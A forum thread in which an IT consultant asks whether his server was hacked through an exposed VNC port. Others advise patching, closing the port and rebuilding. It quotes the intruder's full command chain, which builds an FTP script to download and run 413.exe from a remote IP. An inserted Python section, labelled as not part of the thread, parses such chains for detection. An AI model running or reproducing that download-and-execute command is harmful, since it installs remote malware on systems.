
Have I been hacked?

Status
Not open for further replies.

lifegard2

IS-IT--Management
Mar 28, 2002
Hello,

While working at a client's site today (I'm an IT consultant), I had a remote desktop connection opened from their Win2k3 server into my WinXP Pro desktop. I was physically in front of the server and the desktop was in my remote office.

While typing an email on my desktop, the following text appeared on the screen rather quickly:

Rcmd.exe /c del i&echo open 66.245.220.124 33209 > i&echo user 1 1 >> I &echo get 413.exe >> I &echo quit >> I &ftp -n -s:I &413.exe&del i&exit

It appeared quick enough that it must have been copied and pasted, as I doubt anyone can type that fast.

I minimized the remote desktop window and noticed on the win2k3 server that the RealVNC icon had gone from white to black. Since I'm the only one who knows how to use the VNC connection, it smelled fishy. Netstat showed a connection from 66.245.220.124 on port 5900, the VNC port. The other odd thing is that I noticed the RealVNC icon in the system tray was black earlier today, so I killed all client connections.

Does anyone recognize this attempt? I'm curious what the commands do. From what I can see, it looks like they were trying to execute a remote command prompt and then download some script from an FTP site.

Any ideas? Thanks!
 
You are aware of the horrible vulnerability in VNC 4.1 and earlier? Very easy to exploit and bypass authentication. You should update VNC to 4.2 or newer ASAP if you haven't already and run it on a port other than 5900/5800.

RoadKi11
 
I did some research on that 413.exe file. I'm sorry to say it looks bad; everything I found on it has to do with porno. Not sure what it does, but I bet it wasn't put there to help make your server run better, that's for sure. You probably should get that box off your network right away and do a full system rebuild and restore. I hope it's not an important server.

RoadKi11
 
That IP belongs to an ISP called dslextreme; you may be able to contact them and figure out who belongs to that IP. If nothing else they may be able to let that user know his box has been compromised. Could be a botnet, who knows.


Good Luck,

RoadKi11
 
I don't think I'm infected. Whoever it was pasted the command into an email message I was typing, they never reached the command console. Also, I don't have rcmd setup on any of my systems, so I don't think it would have worked even if they weren't typing into an email.

From what I can tell, it looks like they were trying to open up an FTP connection on port 33209 (vs 21) to the IP address listed. I actually tried manually connecting via FTP to that address and port and was able to do so successfully, but I was unable to retrieve a directory listing.

That being said, I think at this time the only compromise is w/ VNC. I will definitely look into updating it ASAP.
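To make the pasted chain concrete from a defender's side, here is an added example (not from the thread or from any of the posters): it splits the `cmd /c` chain on `&`, reconstructs the FTP script that the `echo ... > i` / `>> I` redirects build, and reports the download-and-execute pattern (`ftp -s:` followed by running the fetched file). The sample command line is the one quoted above; the `FtpDropper` class and `analyze` function are my own names.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: the chain quoted in the thread, as it might appear in a
# process-creation log. On Windows 'i' and 'I' name the same file.
SAMPLE = ("Rcmd.exe /c del i&echo open 66.245.220.124 33209 > i&echo user 1 1 >> I "
          "&echo get 413.exe >> I &echo quit >> I &ftp -n -s:I &413.exe&del i&exit")

ECHO_RE = re.compile(r"^echo\s+(.*?)\s*>{1,2}\s*(\S+)$", re.I)  # echo <line> > <file>
FTP_RE = re.compile(r"^ftp\b.*?-s:(\S+)", re.I)                  # ftp ... -s:<script>

@dataclass
class FtpDropper:
    server: str = ""
    port: int = 21
    script: list = field(default_factory=list)    # reconstructed FTP script lines
    fetched: list = field(default_factory=list)   # file names passed to 'get'
    executed: list = field(default_factory=list)  # fetched names later run as commands
    cleans_up: bool = False                       # script file deleted afterwards

    def is_download_and_execute(self) -> bool:
        return bool(self.server and self.executed)

def analyze(cmdline: str) -> FtpDropper:
    """Rebuild an echo-built FTP script from a cmd '&' chain and report whether
    the chain downloads a file and then executes it."""
    body = re.sub(r"^\S*cmd(\.exe)?\s+/c\s+", "", cmdline.strip(), flags=re.I)
    parts = [p.strip() for p in body.split("&") if p.strip()]
    files = {}               # script file name (lower-cased) -> echoed lines
    result = FtpDropper()
    script_file = None
    for part in parts:
        if m := ECHO_RE.match(part):
            files.setdefault(m.group(2).lower(), []).append(m.group(1))
        elif m := FTP_RE.match(part):
            script_file = m.group(1).lower()
            result.script = files.get(script_file, [])
            for line in result.script:
                tok = line.split()
                if len(tok) > 1 and tok[0].lower() == "open":
                    result.server = tok[1]
                    if len(tok) > 2 and tok[2].isdigit():   # non-default port
                        result.port = int(tok[2])
                elif len(tok) > 1 and tok[0].lower() == "get":
                    result.fetched.append(tok[-1])
        else:
            tok = part.split()
            if tok and tok[0].lower() == "del" and script_file and tok[-1].lower() == script_file:
                result.cleans_up = True
            elif tok and tok[0].lower() in {f.lower() for f in result.fetched}:
                result.executed.append(tok[0])
    return result
```

Run against the sample, this reports the FTP server 66.245.220.124 on port 33209, the fetched file 413.exe, its execution, and the deletion of the script file, which is the whole "drop a script, fetch, run, clean up" sequence the poster was asking about.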
 
So you have port forwarding on the router to enable access by VNC from external connections? I would consider taking that out for a bit, scanning every computer on the network thoroughly, and upgrading any VNC instances.

Never, ever base your security around "I don't think".


Carlsberg don't run I.T departments, but if they did they'd probably be more fun.
 
I agree, you got lucky and saw the security breach first hand one time. That server could have been exploited dozens of times that you haven't witnessed. It's better to err on the side of caution with this one.

just my 2 cents.

RoadKi11
 
Yup, agreed. I already upgraded to 4.1.2, then disabled the service. I'll be closing the port soon. The VPN overhead slows VNC connections to a crawl, but the alternative is far worse. I guess there's also a silver lining to slow connections, I'm a consultant and bill hourly. ;)
 